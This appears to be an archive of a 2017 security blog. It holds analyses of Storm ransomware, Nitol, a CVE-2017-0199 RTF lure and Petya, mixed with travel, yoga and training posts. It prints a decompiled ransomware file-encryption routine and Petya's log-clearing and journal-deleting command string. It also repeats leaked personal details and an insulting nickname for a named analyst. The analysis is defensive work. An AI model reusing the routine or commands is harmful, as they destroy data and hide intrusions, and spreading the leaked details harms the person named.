
Monday, August 7, 2017

Malspam Email Analysis by Malware Traffic Analysis Team:

In a recent post, the Malware Traffic Analysis team did a good analysis of malspam emails and of how that spam campaign works. Please refer to their post:

Please refer to the following links to download the email, pcap and other files.
Zip archive of the emails:   11.5 kB (11,482 bytes)

Zip archive of the pcap:   54.6 kB (54,572 bytes)

Zip archive of the malware and artifacts:   1.01 MB (1,008,835 bytes)

Note: ZIP files are password-protected with the standard password.

Post made by

Monday, July 31, 2017

Breach and leak in Mandiant

Imagine how embarrassing it is when a pickpocket steals from a cop; it is the same when hackers break into the system of a threat intelligence analyst. Yes, a hacker broke into the system of a threat intelligence analyst from Mandiant Security. The company was worth one billion USD when FireEye acquired it in 2014. The leaked dump contains sensitive information such as network topology and threat intelligence profiles for the Defence forces of Israel, and it also contains company worksheets. #leakTheAnalyst is the tag found on social networks.

Looking into the leaked details shows how heavily they targeted this particular threat intelligence analyst. We feel it could be an insider job targeting one particular employee, like a spy inside the organisation.

The depth of the breach is shown in the leak. See the snapshot below:
One of the worst things is that it kills the career of the cyber-security person named Adi Peretz.
Victim #1 Profile:
--- Name: Adi Peretz
--- Op. Nickname: Mr. Muscle AKA FatFuck
--- Position: Senior Threat Intelligence Analyst at Mandiant

In the leak they mention that the victim analyst had an HR interview with Novartis, and they sarcastically note that it might be cancelled.

Post made by

Sunday, July 30, 2017

Road Trip Experience From Our Friend (Chennai to Thiruvarur via Pondicherry - To and Fro):

This post is about a road trip experience, as told by our friend. They travelled from Chennai to Thiruvarur via Pondicherry. It was almost 300 km, and it was raining for most of the journey.
Chennai to Thiruvarur via Pondicherry (aka Puducherry)
They started their journey on Friday early morning at 12:05 AM. Before the journey they expected it to take 7 hours to reach Thiruvarur. They filled the fuel tank for 1000 rs, i.e. nearly 15 litres of petrol, at 67 rs and some paise per litre. The gang started their journey, chose OMR (Old Mahabalipuram Road) and reached Pondicherry by 1:45 AM. Actually that is the best time I have ever heard of: usually it takes almost 3 hours to reach Pondicherry, but the gang reached it in 1 hour 40 minutes.
There they took a break and had a good tea. They had a chat about the petrol price in Pondicherry and went straight to the nearest petrol pump. To their surprise, petrol was only 63 rs and some paise, so they filled petrol for 1700 rs, which was a good saving. They started again from Pondicherry towards Thiruvarur; they heard there had been heavy rain some hours earlier, but luckily during their drive they saw only lightning. Google Maps was their guide for the whole journey, and the Saavn songs app helped them stay focused and keep up the enjoyment without any sleep. Only peppy numbers were playing on their sound system.
They reached Thiruvarur before 5 AM. That was so fast: they saved more than 2 hours on the journey.

Thiruvarur Tank on Map

Travelling Back To Chennai:

This time they started at 10:35 PM on Saturday night. Within a minute they got stuck in temple-festival traffic. A procession of temple idols was passing and people were watching and praying in the street. Good fireworks were seen that night.
The temple festival is shown in the video above. Check out this procession.

During the journey it rained heavily; they captured video of it and uploaded it to YouTube.

These videos were taken during heavy rain on their way back to Chennai. Despite the rain they reached Chennai in the same five hours. Kind of fast and furious driving.

Enjoy the journey!!!

Post created by

Storm Ransomware:

Today we are analysing a malware sample with hash 791b700810e356339066b67f2f4febc9089b5541d602946a243dfb15e6f3918e. It is referred to as a Storm ransomware sample.

Storm Ransomware
The sample is compiled with the .NET compiler. Here is a snapshot of the .NET compiler detection for the file. Reversing that code is very much possible; let's try it.
.net compiled
Interesting strings present:

0000000052EF   0000004070EF      0   Property can only be set to Nothing
000000005337   000000407137      0   WinForms_RecursiveFormCreate
000000005371   000000407171      0   WinForms_SeeInnerException
0000000053CF   0000004071CF      0   .accdb
0000000053E7   0000004071E7      0   .aepx
00000000547B   00000040727B      0   .class
0000000054FD   0000004072FD      0   .docb
000000005509   000000407309      0   .docm
000000005515   000000407315      0   .docx
00000000552B   00000040732B      0   .dotm
000000005537   000000407337      0   .dotx
000000005593   000000407393      0   .idml
0000000055A9   0000004073A9      0   .indb
0000000055B5   0000004073B5      0   .indd
0000000055C1   0000004073C1      0   .indl
0000000055CD   0000004073CD      0   .indt
0000000055ED   0000004073ED      0   .java
0000000055F9   0000004073F9      0   .jpeg
000000005623   000000407423      0   .m3u8
000000005693   000000407493      0   .mpeg
00000000578F   00000040758F      0   .potm
00000000579B   00000040759B      0   .potx
0000000057A7   0000004075A7      0   .ppam
0000000057C7   0000004075C7      0   .ppsm
0000000057D3   0000004075D3      0   .ppsx
0000000057E9   0000004075E9      0   .pptm
0000000057F5   0000004075F5      0   .pptx
000000005801   000000407601      0   .prel
00000000580D   00000040760D      0   .prproj
0000000058A3   0000004076A3      0   .sldm
0000000058AF   0000004076AF      0   .sldx
000000005965   000000407765      0   .xlam
000000005999   000000407799      0   .xlsb
0000000059A5   0000004077A5      0   .xlsm
0000000059B1   0000004077B1      0   .xlsx
0000000059C7   0000004077C7      0   .xltm
0000000059D3   0000004077D3      0   .xltx
000000005A0F   00000040780F      0   Label1
000000005A1E   00000040781E      0   _______________________________________________________________________________________
000000005ACE   0000004078CE      0   Button1
000000005AE4   0000004078E4      0   Microsoft Sans Serif
000000005B0E   00000040790E      0   Label2
000000005B1C   00000040791C      0   Storm Ransomware
000000005B3E   00000040793E      0   RichTextBox1
000000005B5A   00000040795A      0   Label3
000000005B68   000000407968      0   Send mony to my bitcoin :
000000005B9C   00000040799C      0   Label5
000000005BB2   0000004079B2      0   Label6
000000005BC0   0000004079C0      0   Contact Me : 
000000005BDC   0000004079DC      0   Button2
000000005BF6   0000004079F6      0   TextBox1
000000005C08   000000407A08      0   Form1
000000005C22   000000407A22      0   taskmgr.exe
000000005C3A   000000407A3A      0   ProcessHacker.exe
000000005C5E   000000407A5E      0   FullName
000000005C82   000000407A82      0   Hassan
000000005C90   000000407A90      0   HassanAmiri
000000005CA8   000000407AA8      0   Winrar
000000005CB7   000000407AB7      0   Hello You Are Hacked Now !! All your personal files have been encrypted ! if you want restore your data you have to pay ! Remember you can't restore your data without our decryptor !!!!
000000005E2B   000000407C2B      0   ertyuioppoiuhygtfrdeRFTGYHDEZEFFZEF
000000005E73   000000407C73      0   StormRansomware(at)gmail(dot)com

This list of strings gives more detail about the file extensions, i.e. the file types targeted by the Storm ransomware. It also reveals the function of the buttons ("Send mony to my bitcoin", "Contact Me") and shows the contact email id StormRansomware(at)gmail(dot)com.
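As an added example (not code from the original post), a small Python triage script that parses the three-column strings listing above and sorts the entries into targeted extensions, the process names the sample looks for, defanged contact addresses and ransom-note text; the excerpt it runs on is copied from the listing above, and the regexes and bucket names are this example's own.

```python
import re
from typing import Dict, List

# Excerpt copied from the strings listing above, in its three-column layout:
# file offset, virtual address, section index, string.
SAMPLE_STRINGS = """\
0000000053CF   0000004071CF      0   .accdb
000000005515   000000407315      0   .docx
0000000059B1   0000004077B1      0   .xlsx
000000005A0F   00000040780F      0   Label1
000000005B1C   00000040791C      0   Storm Ransomware
000000005B68   000000407968      0   Send mony to my bitcoin :
000000005C22   000000407A22      0   taskmgr.exe
000000005C3A   000000407A3A      0   ProcessHacker.exe
000000005CB7   000000407AB7      0   Hello You Are Hacked Now !! All your personal files have been encrypted !
000000005E73   000000407C73      0   StormRansomware(at)gmail(dot)com
"""

LINE_RE = re.compile(r"^([0-9A-Fa-f]{12})\s+([0-9A-Fa-f]{12})\s+(\d+)\s+(.*)$")
EXT_RE = re.compile(r"^\.[A-Za-z0-9]{1,7}$")                # ".docx", ".prproj", ...
PROCESS_RE = re.compile(r"^[\w-]+\.exe$", re.IGNORECASE)    # tools the sample looks for
# Defanged address exactly as it sits in the binary: user(at)host(dot)tld
DEFANGED_MAIL_RE = re.compile(r"^[\w.+-]+\(at\)[\w-]+(?:\(dot\)[\w-]+)+$")
NOTE_WORDS = ("encrypted", "decryptor", "bitcoin")

def parse_strings(listing: str) -> List[Dict[str, object]]:
    """Parse the listing into records; lines that do not fit the layout are skipped."""
    records = []
    for raw in listing.splitlines():
        m = LINE_RE.match(raw.rstrip())
        if m:
            off, va, sect, text = m.groups()
            records.append({"offset": int(off, 16), "va": int(va, 16),
                            "section": int(sect), "text": text})
    return records

def triage(listing: str) -> Dict[str, List[str]]:
    """Bucket each string into the indicator classes discussed in the post."""
    out: Dict[str, List[str]] = {"extensions": [], "processes": [],
                                 "contacts": [], "ransom_note": []}
    for rec in parse_strings(listing):
        text = str(rec["text"]).strip()
        if EXT_RE.match(text):
            out["extensions"].append(text.lower())
        elif PROCESS_RE.match(text):
            out["processes"].append(text)
        elif DEFANGED_MAIL_RE.match(text):
            out["contacts"].append(text)        # kept defanged on purpose
        elif any(word in text.lower() for word in NOTE_WORDS):
            out["ransom_note"].append(text)
    return out

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_STRINGS).items():
        print(f"{bucket} ({len(items)}):")
        for item in items:
            print(f"  {item}")
```

The same parser runs unchanged over the full listing above, which is how the complete extension list can be pulled out for a file-type watchlist.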
Possibly the email id and password details are in there as well. We disassembled the code; please refer to the following snapshots of the code:

Email id and password details
Process detail
The following code snippet is the cryptography-related routine:
using System.IO;
using System.Security.Cryptography;
using System.Text;

// Decompiled encryption routine of the sample. "nombre" is the path of the
// file to encrypt and "password" is the key material.
public static void EC(string nombre, string password)
{
    // Key is the raw password bytes zero-padded to 32 bytes: no KDF, no salt
    byte[] array = new byte[32];
    Encoding.Default.GetBytes(password).CopyTo(array, 0);
    RijndaelManaged rijndaelManaged = new RijndaelManaged
    {
        Mode = CipherMode.CBC,
        KeySize = 256,
        BlockSize = 256,                 // Rijndael with 256-bit blocks, not plain AES
        Padding = PaddingMode.Zeros
    };
    byte[] array2 = File.ReadAllBytes(nombre);
    MemoryStream memoryStream = new MemoryStream();
    // The same 32-byte array serves as both the key and the IV
    CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(array, array), CryptoStreamMode.Write);
    cryptoStream.Write(array2, 0, array2.Length);
    byte[] array3 = memoryStream.ToArray();
    byte[] array4 = new byte[checked(array3.Length - 1 + 1)];   // decompiler artefact: same length as array3
    array3.CopyTo(array4, 0);
    // The ciphertext overwrites the original file in place
    File.WriteAllBytes(nombre, array4);
}

Top AV vendors currently detect this variant; the common detection name is MSIL crypter.

Post made by

Wednesday, July 26, 2017

Recent spam campaign

This is about a recent spam campaign. We request companies to take note of the warning. Refer to this image.
Post by newWorld 

Simple Note on Yoga and Meditation:

Yoga and meditation bring peace and harmony to the human body as well as to the whole world. Relieving stress from the body fires up the neurons and brings superior performance in one's chosen field. Imagine if that performance is combined with laser-sharp focus; the output is highly respectable. To achieve that state, yoga and meditation (two sides of the same coin) help on the journey.

Note by

Friday, July 21, 2017

Computer Virus (in Tamil)

Friends!!! If people learn all the technology and science we need to learn in their mother tongue, progress is certain!!!

As a first step... our website is setting out to deliver technology and science content through Tamil.

What is a computer virus?
Just as humans are attacked by microbes such as viruses, our computer is attacked by virus programs. A virus is a program; and a program is... a set of instructions written to be executed one after another.
For a computer to work we need an operating system, which contains many applications and software. This virus program attacks the operating system's programs and inserts its own instructions into them, and in many cases destroys the instructions of that software.

We will look at this in full in upcoming articles...

(There will be many spelling mistakes... we apologise...)

New World!!!

Thursday, July 20, 2017

Banking Malware Campaign in Excel:

A recent banking malware campaign using Excel files has been found in the wild. Security researchers from Lmntrix did their research on this and shared their analysis in a recent post.
Please refer to their post:

Post made by

Command to change the file extensions inside the folder:

Let us take a simple scenario. You have a file without any extension; it can be an executable or a non-PE file. To run that file you need to give it the correct extension, e.g. .pdf, .ppt, .js, .exe, etc.
Pressing F2 after selecting the file prompts the user to change the file name, so the user can easily change the name (including the extension).

What if you need to change the extension of 'n' files inside a folder?
It is not easy to choose each and every file and change its extension.
We will give you a simple command:

ren *.* *.jpg
ren *.* *.exe

The first command gives the files inside the folder the .jpg extension, and the second one changes the extension to .exe. These pretty simple commands get the job done.
Renaming files extension inside the folder
Refer to the snapshot above to see how it worked on the Windows platform.

Post made by

Tuesday, July 11, 2017

Analysis of Nitol:

About Nitol:

  • Nitol is a family of Trojans that performs DDoS (distributed denial of service) attacks, allows backdoor access and control, downloads and runs files, and performs a number of other malicious activities on your computer. The botnet is accessed through a dynamic DNS service.
History of Nitol (Discovery):
  • The Trojan was preloaded during assembly and manufacturing in China, on machines that came brand new from the factory. These laptops and desktops were sold in large numbers (maybe because of the cheap price), which led to worldwide distribution.
  • In August 2011, researchers from the Microsoft Digital Crimes Unit purchased 20 computers (10 laptops and 10 desktops) from various cities in China. 4 out of the 20 machines were found to be infected with malware, and one of those infections was Nitol.

Malware names found:
  • HTTP Backdoor
  • FTP Backdoor
  • Suspicious – non-malicious
  • IRC Backdoor

  • The computer preloaded with Nitol was the only one that was actively running and had attempted to connect to a command and control (C&C) server.
  • Infection statistics of Nitol, taken from Microsoft telemetry.

The most commonly used Nitol Domains:

Distribution of Malware Using
  • On 10 September 2012 Microsoft took action against the Nitol botnet by obtaining a court order and subsequently sinkholing the domain.
  • Microsoft later settled with the operator Pen Yong, which allowed the latter to continue operating the domain on the condition that any subdomains linked to malware remain sinkholed.
  • Status - 
Behaviour of Nitol:
  • Nitol spreads through removable media and mapped network shares. It picks directories that contain applications (.EXE, .DLL, .OCX files) and compressed archives (e.g. .RAR and .ZIP), and sets the file attributes SYSTEM/READ-ONLY/HIDDEN. This is done by exploiting the module loading process used by Windows with an infected file LPK.DLL (a component of the Microsoft Language Pack, Lpksetup.exe).
  • LPK.DLL is used to exploit the module loading process Windows follows when it runs applications. Since applications look for LPK.DLL in their current directory before any other place, Nitol's copy gets loaded instead of the file of the same name provided by Microsoft in the System32 directory.
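The search-order behaviour described above gives defenders a simple thing to look for: a copy of lpk.dll sitting next to applications or archives outside the system directories. As an added example (not part of the original analysis), a Python scanner that walks a tree and reports such copies, noting what else is in the directory and, on Windows, whether the HIDDEN and SYSTEM attributes are set; the demo tree it builds is constructed, and the attribute check is skipped on other platforms.

```python
import os
import stat
import tempfile
from typing import List, Tuple

# Directory contents the post says Nitol looks for when picking where to plant itself.
APP_EXTS = {".exe", ".dll", ".ocx"}
ARCHIVE_EXTS = {".rar", ".zip"}
# The system DLL name that gets planted beside applications: a per-application
# copy is found by the loader before %SystemRoot%\System32\lpk.dll.
HIJACK_NAME = "lpk.dll"

def legit_system_dirs() -> List[str]:
    """Where lpk.dll legitimately lives (Windows only; empty list elsewhere)."""
    root = os.environ.get("SystemRoot")
    if not root:
        return []
    return [os.path.normcase(os.path.join(root, d)) for d in ("System32", "SysWOW64")]

def has_hidden_system_attrs(path: str) -> bool:
    """True when the file carries both HIDDEN and SYSTEM attributes (Windows only)."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    wanted = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0) | getattr(stat, "FILE_ATTRIBUTE_SYSTEM", 0)
    return wanted != 0 and (attrs & wanted) == wanted

def scan_for_planted_lpk(root: str) -> List[Tuple[str, str]]:
    """Walk root and return (path, reason) for every lpk.dll outside the system dirs.

    The reason records what else sits in that directory, because Nitol plants the
    DLL specifically beside applications and archives.
    """
    system_dirs = legit_system_dirs()
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        hits = [f for f in files if f.lower() == HIJACK_NAME]
        if not hits or os.path.normcase(dirpath) in system_dirs:
            continue
        others = {os.path.splitext(f)[1].lower() for f in files if f.lower() != HIJACK_NAME}
        path = os.path.join(dirpath, hits[0])
        reasons = []
        if others & APP_EXTS:
            reasons.append("beside application files")
        if others & ARCHIVE_EXTS:
            reasons.append("beside archives")
        if has_hidden_system_attrs(path):
            reasons.append("hidden+system attributes")
        findings.append((path, "; ".join(reasons) or "outside system directory"))
    return sorted(findings)

def build_demo_tree() -> str:
    """Constructed tree of empty files so the scanner can be exercised offline."""
    root = tempfile.mkdtemp(prefix="lpk_demo_")
    for rel in ("app/tool.exe", "app/lpk.dll", "docs/notes.txt",
                "share/backup.zip", "share/LPK.DLL", "clean/lib.dll"):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "wb").close()
    return root

if __name__ == "__main__":
    for path, reason in scan_for_planted_lpk(build_demo_tree()):
        print(f"{path}: {reason}")
```

Pointed at a real volume, the same scanner would also flag legitimate redistributed copies, so each finding still needs a hash or signature check before acting on it.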

We got the YARA rule for this Nitol variant:
Yara Rule
rule Nitol : Nitol
{
    strings:
        $a = {5E 26 2A 2E 68 74 6D}                               // "^&*.htm"
        $b = {25 63 25 63 25 63 25 63 25 63 25 63 2E 65 78 65}    // "%c%c%c%c%c%c.exe"
        $C = {4C 70 6B}                                           // "Lpk"
    condition:
        $a and $b and $C
}

Components of Nitol:

  • Installer
  • Dropper - (Infected LPK and Backdoor)
  • Downloaded files for DDOS
[Detection Info]
    * Filename: C:\Documents and Settings\Norman\Desktop\Nitol.
    * Sandbox name: W32/Obfuscated.MA.
    * Signature name: NOT_SCANNED.
    * Compressed: NO.
    * TLS hooks: NO.
    * Executable type: Library (DLL).
    * Executable file structure: OK.
    * Filetype: PE_I386.
[General information]
    * Accesses executable file from resource section
    * Drops files in %WINSYS% folder.
    * Anti debug/emulation code present.
    * File length: 46592 bytes.
    * MD5 hash: b339de14bae1157e652b0ea7d070113e.
    * SHA1 hash: 99624d63106ccff4a2e2feb9d32437bfd2f183ab.
[Changes to file-system]
    * Creates file C:\Windows\Temp\tmp.1.
    * Creates file C:\WINDOWS\system32\sqqggi.exe.
    * Creates file C:\WINDOWS\TEMP\SOFTWARE.LOG.
    * Deletes file C:\Windows\Temp\tmp.1.
[Changes to registry]
    * Accesses Registry key "HKLM\SYSTEM\CurrentControlSet\Services\Distribulgs"
    * Creates key "HKLM\System\CurrentControlSet\Services\Distribulgs".
    * Sets value "ImagePath"="C:\WINDOWS\system32\sqqggi.exe" in key "HKLM\System\CurrentControlSet\Services\Distribulgs".
    * Sets value "DisplayName"="Distribuoax Transaction Coordinator Service" in key "HKLM\System\CurrentControlSet\Services\Distribulgs".
    * Sets value "Description"="Distribueuu Transaction Coordinator Service." in key "HKLM\System\CurrentControlSet\Services\Distribulgs".
[Process/window information]
    * Creates a mutex Distribulgs.
    * Creates process "tmp.1".
    * Creates service "Distribulgs (Distribuoax Transaction Coordinator Service)" as "C:\WINDOWS\system32\sqqggi.exe".
    * Creates process "sqqggi.exe".
    * Creates an unnamed event.
    * Creates process "svchost.exe".
    * Reads memory in process "svchost.exe".
    * Modifies memory in process "svchost.exe".
    * Modified OS kernel function code in process "svchost.exe".

Static Analysis
MD5 - B339DE14BAE1157E652B0EA7D070113E
The working of the sample is shown clearly in the sandbox.
The file is a DLL that has the executable in the Resource Data. 
101 – Mutex
102 – Executable
The executable also has a file in its resources:
33 - DLL

The working of the installer is simple:
  • Find the resources (mutex and dropper)
  • Register the mutex
  • Drop a file from the RCData dropper into %temp% with prefix hrn
  • Infection code for loading a hidden copy of lpk.dll, and code for spreading

The working is shown clearly in the diagram:

The main file of Nitol has now dropped a file in Windows\System32 and also dropped a copy of the infected LPK.DLL named hra33.dll, which is later deleted.

Dropped %C%C%C%C%C%C.exe
MD5 - B339DE14BAE1157E652B0EA7D070113E
  • This sample is the most important part of the analysis, as it is responsible for creating the service and the registry entry, downloading files and performing DDoS attacks.
  • The file has a lot of NOPs right from the WinMain of the dropped file, which might be placeholders to be replaced by active instructions later in the program's development.
Creation of service:

Dropped file in temp with prefix hrl, given a random name of six characters:
Injection of code into svchost.exe:
svchost.exe in memory:
Network connectivity related events:

Connectivity is not established because of the takedown of the botnet:

  • There are some binaries downloaded by Nitol to perform these actions:
  • plusctrl.dll – MD5 - 99E6D6A21A452A24759FD50FB2874BCE
  • hra%u.dll (hra32.dll) – MD5 - 22F2C6088367D608D455ED73527DA02B
  • Stf%C%C%C%C%C.exe
  • These files are downloaded and used by the command and control server to perform various actions.

C&C command IDs:

0x01 (1) - Receive component
    Send a new module to the computer to run.
0x02 (2) - Unknown, but DDoS specific
    Nitol connects to the target address via TCP, UDP or RAW.
0x03 (3) - Unknown, but DDoS specific
    Possible floods: SYN, TCP, UDP, ICMP, HTTP. C&C may command sleep for a specific time.
0x04 (4) - Unknown, but DDoS specific
    Possible floods: SYN, TCP, UDP, ICMP, HTTP. C&C may command sleep for a specific time.
0x05 (5) - Stop work
    Stop DDoS'ing target computers.
0x06 (6) - Clean up
    Delete, set file attributes to Normal, exit.
0x10 (16) - Download & run
    Specify URL and filename to download from the Internet; save the file in the temp directory under the filename "stf[5 random letters].exe"; execute the saved file.
0x12 (18)
    Delete the existing service; download a new executable from the specified URL; save the file in the temp directory under the filename "stf[5 random letters].exe"; execute the saved file.
0x13 (19) - Open URL
    Launch Internet Explorer (specifically) with the specified URL.
0x20 (32) - Start work
    Start DDoS'ing target computers.
0x14 (20) - Open URL as current user
    Launch Internet Explorer (specifically) with the specified URL.
0x77 (119) - Get computer information
    Get computer information and send it to the C&C: computer locale (e.g. EN-US), computer name, operating system name, amount of memory (RAM), CPU speed, Nitol flag (possibly version number), Nitol work DLL flag, timestamp.

  • Most AV vendors detect the malware with the names Nitol, MicroFake and ServStart.
  • Antivirus or antimalware software with the latest definitions will remove the Nitol infection.
  • Use caution when opening attachments and accepting file transfers.
  • Take more care when using removable media; disable autorun/autoplay via group policy.
  • Use strong passwords and never use weak or default passwords (since Nitol variants have the ability to spread via removable media and mapped network shares).
Post made by

Thursday, July 6, 2017

Nutpam - Unique way of learning new technologies


Learning to code and building software is a passion for many people. Those people need learning resources to achieve their goal and become software developers and good programmers. With that dream, many people in India enrol in computer teaching centres and join computer engineering courses. The way of teaching is not the best, and many are frustrated at not getting a job after completing their course. Only after much struggle do many land their dream profession. In a country like India the need for computer programmers is growing at an exponential rate, but if we check their understanding of programming concepts the answer does not seem positive. With all these points in mind, a few people stand out and are trying to fill those missing pieces. In that light, we are going to look at Nutpam Software.
Aim of the Nutpam software
Aim of the Nutpam Software:

Their aim is to take technology to the youngsters of India in such a way that each individual gets broad practical working knowledge rather than just completing their degree. They were formed with the aim of creating a path-breaking change to the current education system. Their ultimate goal in this process is to create powerful people (entrepreneurs) by imparting complete knowledge of the technology while they pursue their education.

Teaching style

They came up with the idea of 'Pora Pokkula Programming', meaning 'programming as you walk'. It uses memes and videos to explain programming concepts in a simpler way.
Let's see some example images (memes) created by Nutpam:

Addition program

This is a simple addition program. It is very easy to understand how the program works!!!

Error 1: Use of Unassigned variable
Unassigned Variable
Error 2: Cannot implicitly convert from datatype1 to datatype2
Error 2

Future Vision
  • To highlight the value of the course to the engineering students studying it and make them more confident in what they can do. One step ahead, in the near future we are planning to bring technology practices to the younger generation at school level.
  • To launch a programming language in Tamil, so that in future every developer working in the language will have more precise knowledge in development.

Nutpam COO’S Interview

Achievements by their students

Nutpam students' placements are updated on their Facebook page. They recently completed their first-year anniversary.
Nutpam First year anniversary
Final year project


Sample Demo Classes Online

 Post by

Wednesday, July 5, 2017

Analysis of Malicious RTF file: CVE-2017-0199

CVE-2017-0199 was found in the latest malware campaign. A patch for this vulnerability was already available in the Microsoft security updates. The vulnerability allows remote attackers to execute arbitrary code via a crafted document.

Sample analysis
We got the RTF file for analysis:

Using the OfficeMalScanner tools (RTFScan):

[*] SCAN mode selected
[*] Opening file C:\Documents and Settings\Desktop\fe2e5d0543b4c8769e401e
[*] Filesize is 6215 (0x1847) Bytes
RTF file format detected. Please use RTFScan.

fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.bin: Rich Text Format data, version 1, unknown character set
MD5: 51c028cd5f3afe9bf179d81def8d7a8e

Embedded OLE document extracted
We extracted the embedded OLE document from this sample. The following image shows the string details:

Strings of OLE object
We tried rtfdump on the same sample and got the following:
We drilled further into that embedded object and found interesting information in it.
Malicious file URL
It downloads a file called myguy.xls from a suspicious IP address.
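The manual drill-down above can be scripted. As an added example (not from the original post or from the rtfdump/OfficeMalScanner tools), a Python triage routine that pulls every \objdata hex payload out of an RTF, searches it for URLs in 8-bit and UTF-16LE text, and flags the combination of \objupdate with a remote URL; the RTF it runs on is a constructed sample, with a placeholder object header, the documentation address 198.51.100.1, and the filename myguy.xls taken from the post.

```python
import re
from typing import Dict, List

# Constructed sample, NOT the file analysed in the post: an \object group whose
# \objdata hex carries a UTF-16LE URL, the shape rtfdump shows for CVE-2017-0199
# lures. The leading bytes are a placeholder header; 198.51.100.1 is a
# documentation address and myguy.xls mirrors the filename named in the post.
_URL = "http://198.51.100.1/myguy.xls"
_OBJDATA_HEX = (b"\x01\x05\x00\x00\x02\x00\x00\x00"
                + _URL.encode("utf-16-le") + b"\x00\x00").hex()
SAMPLE_RTF = (
    r"{\rtf1\ansi\deff0 {\fonttbl{\f0 Calibri;}}"
    r"{\object\objautlink\objupdate\objw1\objh1{\*\objclass Word.Document.8}"
    r"{\*\objdata " + _OBJDATA_HEX + r"}}"
    r"\par Invoice attached.\par}"
).encode("ascii")

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
# \objupdate forces the link to refresh on open; \objautlink marks a linked object.
CONTROL_WORDS = (b"\\objautlink", b"\\objupdate", b"\\objdata", b"\\objemb")
URL_RE = re.compile(r"(?i)\b(?:https?|ftp|file)://[^\s\x00-\x1f\"'<>{}]+")

def extract_objdata(rtf: bytes) -> List[bytes]:
    """Decode the hex payload of every \\objdata group (whitespace tolerated)."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexpart = re.sub(rb"\s+", b"", m.group(1))
        if len(hexpart) % 2:          # truncated trailing nibble
            hexpart = hexpart[:-1]
        try:
            blobs.append(bytes.fromhex(hexpart.decode("ascii")))
        except ValueError:
            continue
    return blobs

def find_urls(blob: bytes) -> List[str]:
    """Look for URLs in both 8-bit and UTF-16LE text inside an OLE payload."""
    found = set()
    for text in (blob.decode("latin-1"), blob.decode("utf-16-le", errors="ignore")):
        found.update(URL_RE.findall(text))
    return sorted(found)

def triage_rtf(rtf: bytes) -> Dict[str, object]:
    """Report the control words and remote URLs that make an RTF worth a closer look."""
    words = [w.decode("ascii") for w in CONTROL_WORDS if w in rtf]
    urls: List[str] = []
    for blob in extract_objdata(rtf):
        urls.extend(find_urls(blob))
    # A linked object that refreshes on open and points at a remote file is the
    # pattern described for this CVE.
    suspicious = "\\objupdate" in words and bool(urls)
    return {"control_words": words, "urls": urls, "suspicious": suspicious}

if __name__ == "__main__":
    print(triage_rtf(SAMPLE_RTF))
```

Real lures often split the hex across lines or hide it behind RTF obfuscation, which is why the hex cleanup tolerates whitespace and a dangling nibble rather than requiring a clean run.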
We searched for it on VT:

VirusTotal result for that malicious link

The patch was already released by Microsoft in April 2017. It is advised to block this malicious URL in the firewall/proxy.

Post made by

Saturday, July 1, 2017

Petya Ransomware Attack Wave

After the WannaCry ransomware attack, Petya ransomware comes with a new wave of attacks. This ransomware campaign is currently taking place and has already impacted companies in countries across the world, including Ukraine, Spain, Russia, the Netherlands, France and India. Industries we are aware of that have already been hit by this cyber-attack include telecommunications, banking, transportation, life sciences, food & beverage, and power & utilities.
The criminals behind the ransomware are requesting a ransom of USD 300 in bitcoin, reportedly to be paid within three days, or else all files on the computer will be deleted (see screenshot below).

Possible mode of entry:
Petya's spreading mechanism is email spam in the form of booby-trapped Office documents. These documents use the CVE-2017-0199 Office RTF vulnerability to download the installer, which leads to the execution of an SMB worm that spreads like WannaCry. Wikileaks
For this CVE, the given description is:
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API."

The generalised description is execution of arbitrary code using a crafted document by remote attackers; remote attacker here means the mode of entry is email spam. We received samples for analysis and, based on our analysis, made the following findings.
Sample SHA-256: 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
This sample is actually very famous, as many researchers have given their opinion on it. So while doing our manual analysis we also found automated analysis reports on the online platforms. But since the sample is a DLL file, we chose to continue our manual analysis. During our analysis we also received another DLL sample:
SHA-256: 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
We compared the compilation time of those samples and found the timestamps mostly similar.

The file properties are almost the same, and when we checked the imported libraries it was confirmed: both files have similar behaviour.
crypt32.dll       Crypto API32
iphlpapi.dll      IP Helper API
ws2_32.dll        Windows Socket 2.0 32-Bit DLL
mpr.dll           Multiple Provider Router DLL
netapi32.dll      Net Win32 API DLL
dhcpsapi.dll      DHCP Server API Stub DLL
The above DLLs are used by the ransomware samples during encryption, downloading, etc. Our interest goes to the Crypto API, from which the functions CryptBinaryToStringW,
CryptStringToBinaryW and CryptDecodeObjectEx are called. These functions convert arrays of bytes to formatted strings and back. Looking further into the strings of the file, we noticed the encryption-related strings:
  • CryptReleaseContext
  • CryptAcquireContext
  • CryptGenRandom
  • CryptExportKey
  • CryptAcquireContext
  • CryptSetKeyParam
  • CryptImportKey
  • CryptEncrypt
  • CryptGenKey
  • CryptDestroyKey
After that we looked at some very interesting strings:
  • Microsoft Enhanced RSA and AES Cryptographic Provider
  • README.TXT
  • kernel32.dll
  • iphlpapi.dll
  • SeTcbPrivilege
  • SeShutdownPrivilege
  • SeDebugPrivilege
  • ComSpec
  • \cmd.exe
  • wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D
  • dllhost.dat
  • wbem\wmic.exe
  • process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1  Application & fsutil usn deletejournal /D

Since this is a DLL file (a non-COM DLL) it needs to be run via rundll32.exe. No user is going to call rundll32.exe to execute a DLL file; a normal user does not know how DLLs are executed. Normally DLL files are loaded by a parent EXE. If we look into the code and strings, we can see the rundll32.exe call and where our sample is stored.
  • 00000001338C   00001001418C      0   ComSpec
